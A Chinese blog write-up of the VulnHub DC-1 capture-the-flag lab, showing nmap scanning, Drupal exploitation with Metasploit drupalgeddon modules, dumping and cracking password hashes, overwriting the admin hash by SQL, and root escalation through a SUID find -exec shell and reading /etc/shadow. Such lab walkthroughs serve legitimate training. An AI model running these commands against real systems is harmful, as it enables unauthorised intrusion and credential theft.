DC1-靶机详解

最新推荐文章于 2024-05-14 19:21:29 发布
最新推荐文章于 2024-05-14 19:21:29 发布
阅读量1.7k 收藏 36
点赞数 37
文章标签: 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TonyChaoWei/article/details/136054625
版权

DC-1 靶机实战分析

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

靶机地址

  • https://www.vulnhub.com/entry/dc-1,292/

任务描述、要求

  • 渗透进机器,拿到5个flag文件
  • 拿到网站的管理员账号
  • 拿到机器最高权限root

实验环境

环境仅供参考

  • VMware® Workstation 16
  • Kali : NAT 模式, 192.168.197.128
  • 靶机 : NAT 模式 197.168.197.145

前期-信息收集

老规矩,先进行 IP 探测,我在部署的时候使用的是 NAT 模式,这里 kali 使用 nmap 嗅探该网段的

语法 nmap -sP <网段>/24

nmap -sP 192.168.197.0/24

可见有5个结果,去除网关和 kali 和 VM 主机以外 192.168.197.145 就是目标了

下面扫描开放端口,还是使用 nmap

nmap -T5 -A -v -p- 192.168.197.145
-T5 :此选项将定时模板设置为激进定时。定时模板的范围从 0(悲观)到 5(疯狂)。将其设置为 T5 会使 Nmap 的扫描变得更为激进,这意味着它发送数据包的速度更快,可以更快地完成扫描,但也增加了被入侵检测系统或防火墙检测到的可能性。
-A:此选项启用了激进模式。它启用了操作系统检测、版本检测、脚本扫描和跟踪路由。这种模式通过尝试检测目标系统的操作系统、软件版本并对发现的服务运行脚本,提供了有关目标系统更多的信息
-v:此选项增加了输出的详细程度。它使 Nmap 更加详细。使用 -v,Nmap 将输出有关扫描进度和结果的更多信息。
-p-:此选项指定扫描所有端口。通过使用 -p-,Nmap 将扫描目标主机上的所有 65535 个 TCP 端口。这与指定特定端口范围或单个端口不同
192.168.197.145:这是 Nmap 将要扫描的目标 IP 地址。它是你想要扫描以查找开放端口、服务和其他信息的主机的 IPv4 地址

22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          32916/tcp6  status
|   100024  1          34020/udp6  status
|   100024  1          38872/tcp   status
|_  100024  1          60167/udp   status

可见开放了 22、80、111 3个端口,且 80 端口运行着 Drupal 这个 CMS

先查看一下web服务 就是一个登录窗 没什么特别的,不太好去爆破这个登录框

中期-漏洞利用

从之前的 nmap 结果得知,目标 80 端口运行着 Drupal 7 版本的 CMS,那么其实有很多公开的 CVE EXP 可供使用

  • CVE-2014-3704
  • CVE-2018-7600
  • CVE-2018-7602
  • CVE-2019-6339
  • CVE-2019-6341

CVE-2018-7602、CVE-2019-6339、CVE-2019-6341 需要认证,这里就懒得测了,以 CVE-2014-3704 和 CVE-2018-7600 为例,Metasploit 自带这2个漏洞的 EXP

msfconsole
use exploit/multi/http/drupal_drupageddon
set RHOSTS 192.168.197.145    
run
"set RHOSTS 192.168.197.145 : 这里设置反射的远程地址"

在这里插入图片描述

可以看到成功弹回一个会话,这里使用 exploit/unix/webapp/drupal_drupalgeddon2 这个模块也可以成功

获取 meterpreter 会话后,先整一个 cmd shell

shell

整个正常交互式的 shell

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
这个命令是用 Python 在交互式终端(PTY)中启动一个 Bash shell,并设置环境变量 TERM 为 xterm。
让我们逐步解释这个命令:
1. `python -c`: 这个部分启动 Python 解释器并执行单行 Python 代码。

2. `'import pty; pty.spawn("/bin/bash")'`: 这是 Python 代码,它导入了 pty 模块并调用了 spawn 函数以在一个伪终端(PTY)中启动 /bin/bash,从而获得一个交互式的 Bash shell。

3. `export TERM=xterm`: 这是在 Bash shell 中设置了一个环境变量 TERM 的命令,将其值设置为 xterm。TERM 环境变量通常用于指定终端类型,这里将其设置为 xterm,表明终端类型为 xterm。

总之,这个命令的作用是在一个交互式的 Bash shell 中设置了 TERM 环境变量,并将其值设置为 xterm。

在这里插入图片描述
ok,现在有了一个 www-data 用户的权限,下面开始按照描述中的找那5个 flag 文件

flag1

先 find 试试

find / -name flag*

在这里插入图片描述

当前目录下就有1个

FLAG1:
Every good CMS needs a config file - and so do you.

我们去config去找找线索

flag2

drupal 7 的配置文件是 /sites/all/modules/domain/settings.inc

cat sites/all/modules/domain/settings.inc
cat: sites/all/modules/domain/settings.inc: No such file or directory

没有找到这个文件,甚至连 domain 目录都没有,那么这个配置文件会不会指的是 CMS 的其他配置文件,比如数据库连接的配置文件 /sites/default/settings.php 咱们去看看

cat sites/default/settings.php

在这里插入图片描述
可以看到 flag2 的内容和 mysql 数据库的账号密码

FLAG2:  Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access).What can you do with these credentials?

flag3

配置文件都写了是 mysql,那就本地直接连接

mysql -u dbuser -p 
成功进去了

在这里插入图片描述

发现有表 ,走 !进去看看

show databases;
use drupaldb;
show tables;

在这里插入图片描述

查询用户名密码

select name,pass from users;
+-------+---------------------------------------------------------+
| name  | pass                                                    |
+-------+---------------------------------------------------------+
|       |                                                         |
| admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |
| Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |
+-------+---------------------------------------------------------+

得到了密码的 hash 就得跑明文了,下面使用 hashcat 爆破

当然不能直接跑,那这辈子都跑不完 得知道 Hash id , hashcat --help 查看 hash 对照表

root@kali:~# hashcat --help | grep "Drupal"
   7900 | Drupal7                                          | Forums, CMS, E-Commerce, Frameworks

这里把 hash 先写到源文件里,等下直接引用

echo "\$S\$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR" > source.txt
echo "\$S\$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg" >> source.txt

这里先盲猜这里会使用简单的弱口令,先用这几个常用的到试试

123456
888888
000000
password
147258
MyPassword
qwerty
Abcd1234
1qaz2wsx
654321
123456789
admin

hashcat -m 7900 -a 0 source.txt pass01.txt

-m 指定要破解的 hash 类型,如果不指定类型,则默认是 MD5
-a 指定要使用的破解模式,其值参考后面对参数。“-a 0”字典攻击,“-a 1” 组合攻击;“-a 3”掩码攻击。
source.txt 你要爆破的 hash 列表
pass01.txt 你的密码表

一切准备就绪,run

在这里插入图片描述

只跑出一个 MyPassword 后面试了一下不是admin的密码

这里只能先换个思路,使用对方加密的方式覆盖原来的密码

php scripts/password-hash.sh 123456
"使用123456替换原密码"

在这里插入图片描述

接着就直接替换掉原密码

UPDATE users SET pass='$S$D8RRzdsLf1t4pNNXAHulu4XGwq.ZmbVOJaQsgF.5rYSNiweMM1ko' WHERE uid = 1;

成功进入网站管理员后台 发现flag3

在这里插入图片描述

FLAG3: Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
查看flag3后,关注点放到passwd文件和shadow文件。Linux为了考虑安全性,用单独的shadow文件存储Linux用户的密码信息,并且只有root用户有权限读取此文件。所以下一步,我们要考虑的是提权了。

后期:后渗透提权

flag4:

cat /etc/passwd

在这里插入图片描述

发现一个 flag4 用户,直接看家目录文件

cat /home/flag4/flag4.txt

FLAG4: Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

使用find 提权

touch demo
find / -name demo -exec "whoami" \;
find / -name demo -exec "/bin/sh" \;
1. `touch demo`: 这个命令在当前目录下创建一个名为 "demo" 的空文件。
2. `find / -name demo -exec "whoami" \;`: 这个命令在文件系统中查找名为 "demo" 的文件,并尝试执行 `whoami` 命令来获取当前用户的用户名。
3. `find / -name demo -exec "/bin/sh" \;`: 这个命令在文件系统中查找名为 "demo" 的文件,并尝试执行 `/bin/sh`。但是同样

提权成功后 查看shadow文件

cat /etc/shadow
切回到kali 使用john破解hash
john flag4 
得到flag4的密码:orange

在这里插入图片描述
在这里插入图片描述

登录进来后 里面有flag4

flag4@DC-1:~$ cat flag4.txt 
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

flag5

通过ssh登录进来后 查看到最后一个flag在root目录下,刚才我们已经提权了 所以直接查看

在这里插入图片描述

小彩蛋

秀一下我家的逆子
在这里插入图片描述

Tony Leung^_^
关注
  • 37
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
ST_DC1-configs:DC1子卡的Machinekit配置文件(对于DE10-Nano)
02-21
ST_DC1-配置 DC1子卡的机器套件配置文件(对于DE10-Nano) 用于ShadeTechnik DC1子卡的DE10-Nano硬件测试和设置的Machinekit Hal和GUI文件。 仍在进行中,可能会进行修订。
靶机DC-1 WP
m0_66638011的博客
05-11 1617
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
网络安全最全DC系列靶机1通关教程_dc1 靶机,2024年来看看网络安全的发展
最新发布
2401_84253089的博客
05-14 987
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
DC-1靶机渗透(教程以及思路)
菜菜的博客
10-20 2903
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
【Vulnhub靶机】DC-1(suid find提权)
过期的秋刀鱼
08-03 417
Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。22、根据 flag4.txt 中的内容,推测下一步需要进行提权,从而获得 root 权限,并访问 /root 目录,获得 flag5。找到了与 http 相关的模块,根据 Rank(等级)优先选择带颜色的模块,使用。
DC靶场系列--DC1
BGiscool的博客
06-28 4835
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
DC-1靶机,初级渗透详细教程
2302_79546589的博客
11-24 1286
根据之前的提示看一下配置文件,一般来说配置文件都有一些特别重要的信息在里面,搞不好还能提权,百度Drupal配置文件,路径是Sites/default/settings.php,我们可以用命令直接搜索并打开,内联执行。这个脚本是用php写的,而且还能用php加参数运行,直接得到加密后的密码,这里我们设置一个密码123。密码加密了,像登录就不太好登陆了,我们可以修改一下admin的密码。看到漏洞还是挺多的,我们用等级比较高,也比较新的18年的漏洞。find比较常用,可以执行root权限的命令找查文件,
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
Romax学习资料-DC1模块-载荷谱处理
03-14
Romax学习资料-DC1模块_载荷谱处理
docker-compose version 1.23.0,build c8524dc1
09-01
centos7安装docker后,并没有安装docker-compose,而且很多源里没有,无法通过yum安装,wget github的源码,有时候会很慢,这里提供一个现成的,源码编译好的docker-compose。centos7安装docker和docker-compose,...
DC1靶机解析+思路
qq_45427131的博客
07-13 2310
DC系列-——dc1靶机解析 确定IP: 首先切换网卡到nat模式,再用kali中的nmap工具扫描当前网段的主机,查看开放主机 指令:nmap -sS 网段 试一下,找dc1的ip 打开界面是这样,看到Drupal(一种CMF框架),再使用nmap扫描80端口综合信息查找版本 指令:nmap -A -p80 DC1的ip 扫描到drupal的版本是7,接下来可以用searchsploit查找对应的漏洞 发现有的有rb文件 (rb文件是导入到msfconsole工具中的漏洞模块),查看是否有关于dr
DC-1靶场
2301_76690905的博客
12-01 66
下载后解压成.ova格式,虚拟机上直接打开这个.ova就行,kali和靶机都调成NET模式因为攻击机和靶机同在局域网使用内网扫描:Nmap扫靶机ip:-v:该选项表示在扫描期间显示详细的输出信息,使您能够更好地了解扫描进度和结果。-A:这是一个组合选项,用于启用一系列高级扫描技术和功能,以便获得更全面的目标主机信息。-A 选项将同时启用以下子选项:主机发现(Host Discovery):尝试确定目标 IP 地址是否可达。
【DC系列】DC-1靶机实战详细讲解
weixin_44681307的博客
06-27 170
Dc-1靶机突破方法
vulnhub靶机-DC系列-DC-1
qq_45953122的博客
08-08 170
DC-1详解
DC-1靶机渗透
plant1234的博客
04-17 1169
简介 靶机名称:DC1 下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 一、信息收集 利用nmap扫描发现主机: nmap -sP 192.168.229.0/24 获取主机为:192.168.229.180 收集主机端口和其它信息: nmap -sS -sV -T5 -A -p- 192.168.229.180 发现开发22端口和80端口,并且运行在Linux上 二、漏洞查找 发现有80端口直接访问得到: 发现是cms是drupal,用msf看一
斐讯dc1服务器什么时候修复,[4月1日更新!!]斐讯DC1插座自制固件接入ha
weixin_42277672的博客
08-03 2543
请注意:工具也要更新到新版本,否则可能会出现问题!前期因按过重启按钮的,可能导致固件损坏,必须重新线刷!老版本的,可能无法OTA,也要重新线刷一次。修复诸多问题,现在可以正常使用了!目前功能情况:断电保持功能正常总开关关闭,其他开关同步关闭总开关关闭的情况下,开启其他开关,总开关会打开LOGO灯和总开关联动,同时开、关增加连接的SSID信息,以及当前设备的IP地址斐讯DC1插座利用ESPHOME自...
vulnhub靶机练习--DC1
qq_34516733的博客
12-24 3616
DC-1靶机详情靶机安装靶机练习信息收集漏洞利用功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 靶机详情 靶机地址:https://www.vulnhub.com/entry/dc-1-1,292/ 靶机描述: DC-1 是一个
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值